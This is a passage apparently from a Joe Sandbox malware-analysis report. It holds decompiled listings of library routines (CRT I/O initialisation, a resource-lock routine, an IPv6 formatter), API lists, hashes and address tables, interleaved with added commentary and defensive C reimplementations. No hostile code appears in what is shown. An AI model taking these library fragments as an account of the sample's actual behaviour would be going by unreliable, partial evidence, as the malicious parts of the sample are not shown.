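    int n = ipv6_to_string(addr, out, sizeof out);
    return n >= 0 && strcmp(out, expected) == 0;
}

/* 1 if addr fits in a buffer of buflen bytes (capped at 64), 0 when truncation is reported. */
int fits_in(const uint8_t addr[16], size_t buflen)
{
    char out[64];
    if (buflen > sizeof out) buflen = sizeof out;
    return ipv6_to_string(addr, out, buflen) >= 0;
}

/* Constructed sample addresses: documentation prefix, loopback, IPv4-mapped, two equal zero
 * runs (first must win), and a single zero group (must not be compressed). */
const uint8_t SAMPLE_DOC[16]      = {0x20,0x01,0x0d,0xb8,0,0,0,0,0,0,0,0,0,0,0,1};
const uint8_t SAMPLE_LOOPBACK[16] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1};
const uint8_t SAMPLE_MAPPED[16]   = {0,0,0,0,0,0,0,0,0,0,0xff,0xff,192,0,2,128};
const uint8_t SAMPLE_TWO_RUNS[16] = {0x20,0x01,0x0d,0xb8,0,0,0,0,0,1,0,0,0,0,0,1};
const uint8_t SAMPLE_ONE_ZERO[16] = {0x20,0x01,0x0d,0xb8,0,0,0,1,0,1,0,1,0,1,0,1};

int main(void)
{
    const uint8_t *samples[] = {SAMPLE_DOC, SAMPLE_LOOPBACK, SAMPLE_MAPPED, SAMPLE_TWO_RUNS, SAMPLE_ONE_ZERO};
    char out[64];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        if (ipv6_to_string(samples[i], out, sizeof out) >= 0)
            printf("%s\n", out);
    return 0;
}
```

The truncation return matters for the decompiled original too: its `_t71 - _t128 >> 1` is exactly the remaining-wide-characters argument passed to `___swprintf_l`, so a caller that misreports the buffer length gets a silently shortened address rather than an overflow.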

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 63d466d6b2867ee6a37c342849f389f37aebfac8de9b743c3109e2ce88eb23b4
                                                        • Instruction ID: 90fe10c7d3d4450449a81cc4e7d0318fe880d573ab505f3de22f70b93a69ba56
                                                        • Opcode Fuzzy Hash: 63d466d6b2867ee6a37c342849f389f37aebfac8de9b743c3109e2ce88eb23b4
                                                        • Instruction Fuzzy Hash: 59613671914655BADF24DF9DC8848BEBBB6FF99300B18C02DE4D6C7A40D278AA40CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 85%
                                                        			// Library code, consistent with the MSVC CRT's _ioinit(): allocate the ioinfo table
                                                        			// (0x20 entries of 0x40 bytes per block), import handles the parent passed via
                                                        			// STARTUPINFO.lpReserved2 (count at cbReserved2 != 0, capped at 0x800), then open the
                                                        			// std handles with GetStdHandle and classify them with GetFileType
                                                        			// (2 = FILE_TYPE_CHAR -> osfile |= 0x40, 3 = FILE_TYPE_PIPE -> osfile |= 0x08).
                                                        			E013B38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                        				signed int* _t82;
                                                        				signed int _t86;
                                                        				long _t90;
                                                        				void* _t91;
                                                        				intOrPtr _t94;
                                                        				signed int _t98;
                                                        				signed int _t99;
                                                        				signed char _t103;
                                                        				void** _t105;
                                                        				void** _t106;
                                                        				void** _t109;
                                                        				signed char _t111;
                                                        				long _t119;
                                                        				void* _t129;
                                                        				signed int* _t133;
                                                        				void* _t135;
                                                        				signed int* _t138;
                                                        				void** _t139;
                                                        				void* _t141;
                                                        				signed int _t142;
                                                        				signed int _t143;
                                                        				void** _t147;
                                                        				signed int _t149;
                                                        				void* _t150;
                                                        				void** _t154;
                                                        				void* _t155;
                                                        				void* _t156;
                                                        
                                                        				_push(0x64);
                                                        				_push(0x13c2260);
                                                        				E013B2400(__ebx, __edi, __esi);
                                                        				E013B442F(0xb);
                                                        				 *(_t155 - 4) = 0;
                                                        				_push(0x40);
                                                        				_t141 = 0x20;
                                                        				_push(_t141);
                                                        				_t82 = E013B4869();
                                                        				_t133 = _t82;
                                                        				 *(_t155 - 0x24) = _t133;
                                                        				if(_t133 != 0) {
                                                        					 *0x13c4848 = _t82;
                                                        					 *0x13c50e4 = _t141;
                                                        					while(_t133 <  &(_t82[0x200])) {
                                                        						_t133[1] = 0xa00;
                                                        						 *_t133 =  *_t133 | 0xffffffff;
                                                        						_t133[2] = 0;
                                                        						_t133[9] = _t133[9] & 0x00000080;
                                                        						_t133[9] = _t133[9] & 0x0000007f;
                                                        						_t133[9] = 0xa0a;
                                                        						_t133[0xe] = 0;
                                                        						_t133[0xd] = 0;
                                                        						_t133 =  &(_t133[0x10]);
                                                        						 *(_t155 - 0x24) = _t133;
                                                        						_t82 =  *0x13c4848; // 0x0
                                                        					}
                                                        					GetStartupInfoW(_t155 - 0x74);
                                                        					if( *((short*)(_t155 - 0x42)) == 0) {
                                                        						L27:
                                                        						_t129 = 0xfffffffe;
                                                        						L28:
                                                        						_t142 = 0;
                                                        						while(1) {
                                                        							 *(_t155 - 0x2c) = _t142;
                                                        							if(_t142 >= 3) {
                                                        								break;
                                                        							}
                                                        							_t147 =  *0x13c4848 + (_t142 << 6);
                                                        							 *(_t155 - 0x24) = _t147;
                                                        							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
                                                        								_t147[1] = 0x81;
                                                        								if(_t142 != 0) {
                                                        									_t65 = _t142 - 1; // -1
                                                        									asm("sbb eax, eax");
                                                        									_t90 =  ~_t65 + 0xfffffff5;
                                                        								} else {
                                                        									_t90 = 0xfffffff6;
                                                        								}
                                                        								_t91 = GetStdHandle(_t90);
                                                        								 *(_t155 - 0x1c) = _t91;
                                                        								if(_t91 == 0xffffffff || _t91 == 0) {
                                                        									L45:
                                                        									_t147[1] = _t147[1] | 0x00000040;
                                                        									 *_t147 = _t129;
                                                        									_t94 =  *0x13c6100;
                                                        									if(_t94 != 0) {
                                                        										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
                                                        									}
                                                        									goto L47;
                                                        								} else {
                                                        									_t98 = GetFileType(_t91);
                                                        									if(_t98 == 0) {
                                                        										goto L45;
                                                        									}
                                                        									 *_t147 =  *(_t155 - 0x1c);
                                                        									_t99 = _t98 & 0x000000ff;
                                                        									if(_t99 != 2) {
                                                        										if(_t99 != 3) {
                                                        											L44:
                                                        											_t71 =  &(_t147[3]); // -20727868
                                                        											E013B40A2(_t71, 0xfa0, 0);
                                                        											_t156 = _t156 + 0xc;
                                                        											_t147[2] = _t147[2] + 1;
                                                        											goto L47;
                                                        										}
                                                        										_t103 = _t147[1] | 0x00000008;
                                                        										L43:
                                                        										_t147[1] = _t103;
                                                        										goto L44;
                                                        									}
                                                        									_t103 = _t147[1] | 0x00000040;
                                                        									goto L43;
                                                        								}
                                                        							} else {
                                                        								_t147[1] = _t147[1] | 0x00000080;
                                                        								L47:
                                                        								_t142 = _t142 + 1;
                                                        								continue;
                                                        							}
                                                        						}
                                                        						 *(_t155 - 4) = _t129;
                                                        						E013B3B53();
                                                        						_t86 = 0;
                                                        						L49:
                                                        						return E013B2445(_t86);
                                                        					}
                                                        					_t105 =  *(_t155 - 0x40);
                                                        					if(_t105 == 0) {
                                                        						goto L27;
                                                        					}
                                                        					_t135 =  *_t105;
                                                        					 *(_t155 - 0x1c) = _t135;
                                                        					_t106 =  &(_t105[1]);
                                                        					 *(_t155 - 0x28) = _t106;
                                                        					 *(_t155 - 0x20) = _t106 + _t135;
                                                        					if(_t135 >= 0x800) {
                                                        						_t135 = 0x800;
                                                        						 *(_t155 - 0x1c) = 0x800;
                                                        					}
                                                        					_t149 = 1;
                                                        					 *(_t155 - 0x30) = 1;
                                                        					while( *0x13c50e4 < _t135) {
                                                        						_t138 = E013B4869(_t141, 0x40);
                                                        						 *(_t155 - 0x24) = _t138;
                                                        						if(_t138 != 0) {
                                                        							0x13c4848[_t149] = _t138;
                                                        							 *0x13c50e4 =  *0x13c50e4 + _t141;
                                                        							while(_t138 <  &(0x13c4848[_t149][0x200])) {
                                                        								_t138[1] = 0xa00;
                                                        								 *_t138 =  *_t138 | 0xffffffff;
                                                        								_t138[2] = 0;
                                                        								_t138[9] = _t138[9] & 0x00000080;
                                                        								_t138[9] = 0xa0a;
                                                        								_t138[0xe] = 0;
                                                        								_t138[0xd] = 0;
                                                        								_t138 =  &(_t138[0x10]);
                                                        								 *(_t155 - 0x24) = _t138;
                                                        							}
                                                        							_t149 = _t149 + 1;
                                                        							 *(_t155 - 0x30) = _t149;
                                                        							_t135 =  *(_t155 - 0x1c);
                                                        							continue;
                                                        						}
                                                        						_t135 =  *0x13c50e4;
                                                        						 *(_t155 - 0x1c) = _t135;
                                                        						break;
                                                        					}
                                                        					_t143 = 0;
                                                        					 *(_t155 - 0x2c) = 0;
                                                        					_t129 = 0xfffffffe;
                                                        					_t109 =  *(_t155 - 0x28);
                                                        					_t139 =  *(_t155 - 0x20);
                                                        					while(_t143 < _t135) {
                                                        						_t150 =  *_t139;
                                                        						if(_t150 == 0xffffffff || _t150 == _t129) {
                                                        							L22:
                                                        							_t143 = _t143 + 1;
                                                        							 *(_t155 - 0x2c) = _t143;
                                                        							_t109 =  &(( *(_t155 - 0x28))[0]);
                                                        							 *(_t155 - 0x28) = _t109;
                                                        							_t139 =  &(_t139[1]);
                                                        							 *(_t155 - 0x20) = _t139;
                                                        							continue;
                                                        						} else {
                                                        							_t111 =  *_t109;
                                                        							if((_t111 & 0x00000001) == 0) {
                                                        								goto L22;
                                                        							}
                                                        							if((_t111 & 0x00000008) != 0) {
                                                        								L20:
                                                        								_t154 = 0x13c4848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                                        								 *(_t155 - 0x24) = _t154;
                                                        								 *_t154 =  *_t139;
                                                        								_t154[1] =  *( *(_t155 - 0x28));
                                                        								_t37 =  &(_t154[3]); // 0xd
                                                        								E013B40A2(_t37, 0xfa0, 0);
                                                        								_t156 = _t156 + 0xc;
                                                        								_t154[2] = _t154[2] + 1;
                                                        								_t139 =  *(_t155 - 0x20);
                                                        								L21:
                                                        								_t135 =  *(_t155 - 0x1c);
                                                        								goto L22;
                                                        							}
                                                        							_t119 = GetFileType(_t150);
                                                        							_t139 =  *(_t155 - 0x20);
                                                        							if(_t119 == 0) {
                                                        								goto L21;
                                                        							}
                                                        							goto L20;
                                                        						}
                                                        					}
                                                        					goto L28;
                                                        				}
                                                        				_t86 = E013B2600(_t155, 0x13c3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                                                        				goto L49;
                                                        			}
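The middle of the listing (from the `GetStartupInfoW` call to the `while(_t143 < _t135)` loop) decodes the CRT's handle-inheritance block: `lpReserved2` holds a 32-bit count, then one `osfile` flag byte per slot, then one 32-bit `HANDLE` per slot; a slot is imported when its handle is not -1/-2, its `FOPEN` bit (0x01) is set, and it is either a pipe (0x08) or `GetFileType` reports a non-zero type. The C below is an added, stand-alone reimplementation of that decoding; it is not code from the sample or from the CRT. Assumptions: 32-bit handles (the sample is 32-bit), the flag names `FOPEN`/`FPIPE`/`FDEV`/`FTEXT` for the bit values the listing uses, a caller-supplied probe standing in for `GetFileType`, and a constructed sample block. The check that `count` fits inside the block length is an addition: the listing trusts the count handed over by the parent process.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* ioinfo.osfile bits as used in the listing: 0x81 = FOPEN|FTEXT for std handles */
#define FOPEN 0x01
#define FPIPE 0x08
#define FDEV  0x40
#define FTEXT 0x80

#define MAX_INHERITED   0x800u        /* the listing clamps the count at 0x800 */
#define INVALID_HANDLE  0xFFFFFFFFu   /* (HANDLE)-1 */
#define UNOPENED_HANDLE 0xFFFFFFFEu   /* (HANDLE)-2, the listing's _t129 */

typedef uint32_t handle32_t;          /* 32-bit process: HANDLE is 4 bytes */

typedef struct {
    handle32_t osfhnd;
    uint8_t    osfile;
} fd_slot;

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decodes an lpReserved2 block: DWORD count, BYTE osfile[count], HANDLE osfhnd[count].
 * slots[] gets one entry per slot; slots not imported keep osfhnd == INVALID_HANDLE, like the
 * pre-filled table in the listing. file_type_ok(h) stands in for GetFileType(h) != 0.
 * Returns the number of imported slots, 0 for an absent block (the listing's "nothing
 * inherited" path), or -1 when count does not fit in blklen or slotcap (added hardening). */
int parse_reserved2(const uint8_t *blk, size_t blklen, int (*file_type_ok)(handle32_t),
                    fd_slot *slots, size_t slotcap)
{
    if (blk == NULL || blklen < 4)
        return 0;
    uint32_t count = rd32le(blk);
    if (count > MAX_INHERITED)
        count = MAX_INHERITED;
    if (blklen < 4 + (size_t)count * 5 || slotcap < count)
        return -1;

    const uint8_t *flags = blk + 4;
    const uint8_t *handles = flags + count;
    int imported = 0;
    for (uint32_t i = 0; i < count; i++) {
        slots[i].osfhnd = INVALID_HANDLE;
        slots[i].osfile = 0;
        handle32_t h = rd32le(handles + 4u * i);
        if (h == INVALID_HANDLE || h == UNOPENED_HANDLE)
            continue;                                 /* never a live handle */
        if ((flags[i] & FOPEN) == 0)
            continue;                                 /* parent did not mark the slot open */
        if ((flags[i] & FPIPE) == 0 && !file_type_ok(h))
            continue;                                 /* GetFileType() == 0: stale or bogus handle */
        slots[i].osfhnd = h;
        slots[i].osfile = flags[i];
        imported++;
    }
    return imported;
}

/* Constructed sample block (not captured from the sample): five slots. */
const uint8_t SAMPLE_RESERVED2[] = {
    0x05, 0x00, 0x00, 0x00,                             /* count = 5 */
    FOPEN | FDEV, FOPEN | FPIPE, 0x00, FOPEN, FOPEN,    /* osfile per slot */
    0x44, 0, 0, 0,   0x48, 0, 0, 0,   0x4c, 0, 0, 0,    /* handles 0x44, 0x48, 0x4c */
    0xff, 0xff, 0xff, 0xff,   0x50, 0, 0, 0,            /* INVALID_HANDLE, 0x50 */
};
const size_t SAMPLE_RESERVED2_LEN = sizeof SAMPLE_RESERVED2;

/* Stand-in for GetFileType: every handle except 0x50 is a valid object. */
int mock_file_type_ok(handle32_t h)
{
    return h != 0x50;
}

int sample_import_count(void)
{
    fd_slot slots[8];
    return parse_reserved2(SAMPLE_RESERVED2, SAMPLE_RESERVED2_LEN, mock_file_type_ok, slots, 8);
}

handle32_t sample_slot_handle(size_t i)
{
    fd_slot slots[8];
    if (parse_reserved2(SAMPLE_RESERVED2, SAMPLE_RESERVED2_LEN, mock_file_type_ok, slots, 8) < 0 || i >= 5)
        return INVALID_HANDLE;
    return slots[i].osfhnd;
}

int main(void)
{
    fd_slot slots[8];
    int n = parse_reserved2(SAMPLE_RESERVED2, SAMPLE_RESERVED2_LEN, mock_file_type_ok, slots, 8);
    printf("imported %d of 5 slots\n", n);
    for (size_t i = 0; i < 5; i++)
        printf("fd %zu: handle 0x%08x osfile 0x%02x\n", i, (unsigned)slots[i].osfhnd, slots[i].osfile);
    return 0;
}
```

Expected outcome on the constructed block: slots 0 and 1 are imported (device with a good probe, pipe without one), slot 2 is dropped for a clear FOPEN bit, slot 3 for a -1 handle, slot 4 because the probe reports no file type.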






























                                                        0x013b38a8
                                                        0x013b38aa
                                                        0x013b38af
                                                        0x013b38b6
                                                        0x013b38be
                                                        0x013b38c1
                                                        0x013b38c5
                                                        0x013b38c6
                                                        0x013b38c7
                                                        0x013b38ce
                                                        0x013b38d0
                                                        0x013b38d5
                                                        0x013b38f2
                                                        0x013b38f7
                                                        0x013b38fd
                                                        0x013b3906
                                                        0x013b390c
                                                        0x013b390f
                                                        0x013b3912
                                                        0x013b391b
                                                        0x013b391e
                                                        0x013b3924
                                                        0x013b3927
                                                        0x013b392a
                                                        0x013b392d
                                                        0x013b3930
                                                        0x013b3930
                                                        0x013b393b
                                                        0x013b3946
                                                        0x013b3a7b
                                                        0x013b3a7d
                                                        0x013b3a7e
                                                        0x013b3a7e
                                                        0x013b3a80
                                                        0x013b3a80
                                                        0x013b3a86
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3a91
                                                        0x013b3a97
                                                        0x013b3a9d
                                                        0x013b3ab1
                                                        0x013b3ab7
                                                        0x013b3abe
                                                        0x013b3ac3
                                                        0x013b3ac5
                                                        0x013b3ab9
                                                        0x013b3abb
                                                        0x013b3abb
                                                        0x013b3ac9
                                                        0x013b3acf
                                                        0x013b3ad5
                                                        0x013b3b23
                                                        0x013b3b29
                                                        0x013b3b2c
                                                        0x013b3b2e
                                                        0x013b3b35
                                                        0x013b3b3a
                                                        0x013b3b3a
                                                        0x00000000
                                                        0x013b3adb
                                                        0x013b3adc
                                                        0x013b3ae4
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3ae9
                                                        0x013b3aeb
                                                        0x013b3af3
                                                        0x013b3b00
                                                        0x013b3b0b
                                                        0x013b3b12
                                                        0x013b3b16
                                                        0x013b3b1b
                                                        0x013b3b1e
                                                        0x00000000
                                                        0x013b3b1e
                                                        0x013b3b06
                                                        0x013b3b08
                                                        0x013b3b08
                                                        0x00000000
                                                        0x013b3b08
                                                        0x013b3af9
                                                        0x00000000
                                                        0x013b3af9
                                                        0x013b3aa3
                                                        0x013b3aa9
                                                        0x013b3b3d
                                                        0x013b3b3d
                                                        0x00000000
                                                        0x013b3b3d
                                                        0x013b3a9d
                                                        0x013b3b43
                                                        0x013b3b46
                                                        0x013b3b4b
                                                        0x013b3b4d
                                                        0x013b3b52
                                                        0x013b3b52
                                                        0x013b394c
                                                        0x013b3951
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3957
                                                        0x013b3959
                                                        0x013b395c
                                                        0x013b395f
                                                        0x013b3964
                                                        0x013b396e
                                                        0x013b3970
                                                        0x013b3972
                                                        0x013b3972
                                                        0x013b3977
                                                        0x013b3978
                                                        0x013b397b
                                                        0x013b398d
                                                        0x013b398f
                                                        0x013b3994
                                                        0x013b3a2e
                                                        0x013b3a35
                                                        0x013b3a3b
                                                        0x013b3a4b
                                                        0x013b3a51
                                                        0x013b3a54
                                                        0x013b3a57
                                                        0x013b3a5b
                                                        0x013b3a61
                                                        0x013b3a64
                                                        0x013b3a67
                                                        0x013b3a6a
                                                        0x013b3a6a
                                                        0x013b3a6f
                                                        0x013b3a70
                                                        0x013b3a73
                                                        0x00000000
                                                        0x013b3a73
                                                        0x013b399a
                                                        0x013b39a0
                                                        0x00000000
                                                        0x013b39a0
                                                        0x013b39a3
                                                        0x013b39a5
                                                        0x013b39aa
                                                        0x013b39ab
                                                        0x013b39ae
                                                        0x013b39b1
                                                        0x013b39b9
                                                        0x013b39be
                                                        0x013b3a1b
                                                        0x013b3a1b
                                                        0x013b3a1c
                                                        0x013b3a22
                                                        0x013b3a23
                                                        0x013b3a26
                                                        0x013b3a29
                                                        0x00000000
                                                        0x013b39c4
                                                        0x013b39c4
                                                        0x013b39c8
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39cc
                                                        0x013b39dc
                                                        0x013b39e9
                                                        0x013b39f0
                                                        0x013b39f5
                                                        0x013b39fc
                                                        0x013b3a06
                                                        0x013b3a0a
                                                        0x013b3a0f
                                                        0x013b3a12
                                                        0x013b3a15
                                                        0x013b3a18
                                                        0x013b3a18
                                                        0x00000000
                                                        0x013b3a18
                                                        0x013b39cf
                                                        0x013b39d5
                                                        0x013b39da
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39da
                                                        0x013b39be
                                                        0x00000000
                                                        0x013b39b1
                                                        0x013b38ea
                                                        0x00000000

                                                        APIs
                                                        • __lock.LIBCMT ref: 013B38B6
                                                          • Part of subcall function 013B442F: __mtinitlocknum.LIBCMT ref: 013B4441
                                                          • Part of subcall function 013B442F: EnterCriticalSection.KERNEL32(00000000,?,013B37AB,0000000D), ref: 013B445A
                                                        • __calloc_crt.LIBCMT ref: 013B38C7
                                                          • Part of subcall function 013B4869: __calloc_impl.LIBCMT ref: 013B4878
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 013B38E2
                                                        • GetStartupInfoW.KERNEL32(?,013C2260,00000064,013B1654,013C2190,00000014), ref: 013B393B
                                                        • __calloc_crt.LIBCMT ref: 013B3986
                                                        • GetFileType.KERNEL32 ref: 013B39CF
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2772871689-0
                                                        • Opcode ID: da754f77a62c1b6ce1f50bf49b53589930d17e64e9fb6347d91e4e545bfb3738
                                                        • Instruction ID: 463fd28c463a446911fc3b38428eb700c8d6f8cb2cb158ca4cb62a813851a8ee
                                                        • Opcode Fuzzy Hash: da754f77a62c1b6ce1f50bf49b53589930d17e64e9fb6347d91e4e545bfb3738
                                                        • Instruction Fuzzy Hash: 2881A371D042658EDB24CF68D8C06E9BFF4BF05328B24426DD6A6ABBC1E7359402CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 50%
                                                        			E008A0554(signed int _a4, char _a8) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int* _t49;
                                                        				signed int _t51;
                                                        				signed int _t56;
                                                        				signed int _t58;
                                                        				signed int _t61;
                                                        				signed int _t63;
                                                        				void* _t66;
                                                        				intOrPtr _t67;
                                                        				void* _t69;
                                                        				signed int _t70;
                                                        				void* _t75;
                                                        				signed int _t81;
                                                        				signed int _t84;
                                                        				void* _t86;
                                                        				signed int _t93;
                                                        				signed int _t96;
                                                        				intOrPtr _t105;
                                                        				signed int _t107;
                                                        				void* _t110;
                                                        				signed int _t115;
                                                        				signed int* _t119;
                                                        				void* _t125;
                                                        				void* _t126;
                                                        				signed int _t128;
                                                        				signed int _t130;
                                                        				signed int _t138;
                                                        				signed int _t144;
                                                        				void* _t158;
                                                        				void* _t159;
                                                        				void* _t160;
                                                        
                                                        				_t96 = _a4;
                                                        				_t115 =  *(_t96 + 0x28);
                                                        				_push(_t138);
                                                        				if(_t115 < 0) {
                                                        					_t105 =  *[fs:0x18];
                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                        						goto L6;
                                                        					} else {
                                                        						__eflags = _t115 | 0xffffffff;
                                                        						asm("lock xadd [eax], edx");
                                                        						return 1;
                                                        					}
                                                        				} else {
                                                        					L6:
                                                        					_push(_t128);
                                                        					while(1) {
                                                        						L7:
                                                        						__eflags = _t115;
                                                        						if(_t115 >= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _a8;
                                                        						if(_a8 == 0) {
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                        							_t49 = _t96 + 0x1c;
                                                        							_t106 = 1;
                                                        							asm("lock xadd [edx], ecx");
                                                        							_t115 =  *(_t96 + 0x28);
                                                        							__eflags = _t115;
                                                        							if(_t115 < 0) {
                                                        								L23:
                                                        								_t130 = 0;
                                                        								__eflags = 0;
                                                        								while(1) {
                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                        									asm("sbb esi, esi");
                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009401c0;
                                                        									_push(_t144);
                                                        									_push(0);
                                                        									_t51 = L0085F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                        									__eflags = _t51 - 0x102;
                                                        									if(_t51 != 0x102) {
                                                        										break;
                                                        									}
                                                        									_t106 =  *(_t144 + 4);
                                                        									_t126 =  *_t144;
                                                        									_t86 = L008A4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                        									_push(_t126);
                                                        									_push(_t86);
                                                        									L008B3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                        									L008B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                        									_t130 = _t130 + 1;
                                                        									_t160 = _t158 + 0x28;
                                                        									__eflags = _t130 - 2;
                                                        									if(__eflags > 0) {
                                                        										E008E217A(_t106, __eflags, _t96);
                                                        									}
                                                        									_push("RTL: Re-Waiting\n");
                                                        									_push(0);
                                                        									_push(0x65);
                                                        									L008B3F92();
                                                        									_t158 = _t160 + 0xc;
                                                        								}
                                                        								__eflags = _t51;
                                                        								if(__eflags < 0) {
                                                        									_push(_t51);
                                                        									L008A3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                        									asm("int3");
                                                        									while(1) {
                                                        										L32:
                                                        										__eflags = _a8;
                                                        										if(_a8 == 0) {
                                                        											break;
                                                        										}
                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                        										_t119 = _t96 + 0x24;
                                                        										_t107 = 1;
                                                        										asm("lock xadd [eax], ecx");
                                                        										_t56 =  *(_t96 + 0x28);
                                                        										_a4 = _t56;
                                                        										__eflags = _t56;
                                                        										if(_t56 != 0) {
                                                        											L40:
                                                        											_t128 = 0;
                                                        											__eflags = 0;
                                                        											while(1) {
                                                        												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                        												asm("sbb esi, esi");
                                                        												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009401c0;
                                                        												_push(_t138);
                                                        												_push(0);
                                                        												_t58 = L0085F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                        												__eflags = _t58 - 0x102;
                                                        												if(_t58 != 0x102) {
                                                        													break;
                                                        												}
                                                        												_t107 =  *(_t138 + 4);
                                                        												_t125 =  *_t138;
                                                        												_t75 = L008A4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                        												_push(_t125);
                                                        												_push(_t75);
                                                        												L008B3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                        												L008B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                        												_t128 = _t128 + 1;
                                                        												_t159 = _t158 + 0x28;
                                                        												__eflags = _t128 - 2;
                                                        												if(__eflags > 0) {
                                                        													E008E217A(_t107, __eflags, _t96);
                                                        												}
                                                        												_push("RTL: Re-Waiting\n");
                                                        												_push(0);
                                                        												_push(0x65);
                                                        												L008B3F92();
                                                        												_t158 = _t159 + 0xc;
                                                        											}
                                                        											__eflags = _t58;
                                                        											if(__eflags < 0) {
                                                        												_push(_t58);
                                                        												L008A3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                        												asm("int3");
                                                        												_t61 =  *_t107;
                                                        												 *_t107 = 0;
                                                        												__eflags = _t61;
                                                        												if(_t61 == 0) {
                                                        													L1:
                                                        													_t63 = E00885384(_t138 + 0x24);
                                                        													if(_t63 != 0) {
                                                        														goto L52;
                                                        													} else {
                                                        														goto L2;
                                                        													}
                                                        												} else {
                                                        													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                        													_push( &_a4);
                                                        													_push(_t61);
                                                        													_t70 = L0085F970( *((intOrPtr*)(_t138 + 0x18)));
                                                        													__eflags = _t70;
                                                        													if(__eflags >= 0) {
                                                        														goto L1;
                                                        													} else {
                                                        														_push(_t70);
                                                        														L008A3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                        														L52:
                                                        														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                        														_push( &_a4);
                                                        														_push(1);
                                                        														_t63 = L0085F970( *((intOrPtr*)(_t138 + 0x20)));
                                                        														__eflags = _t63;
                                                        														if(__eflags >= 0) {
                                                        															L2:
                                                        															return _t63;
                                                        														} else {
                                                        															_push(_t63);
                                                        															L008A3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                        															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                        															_push( &_a4);
                                                        															_push(1);
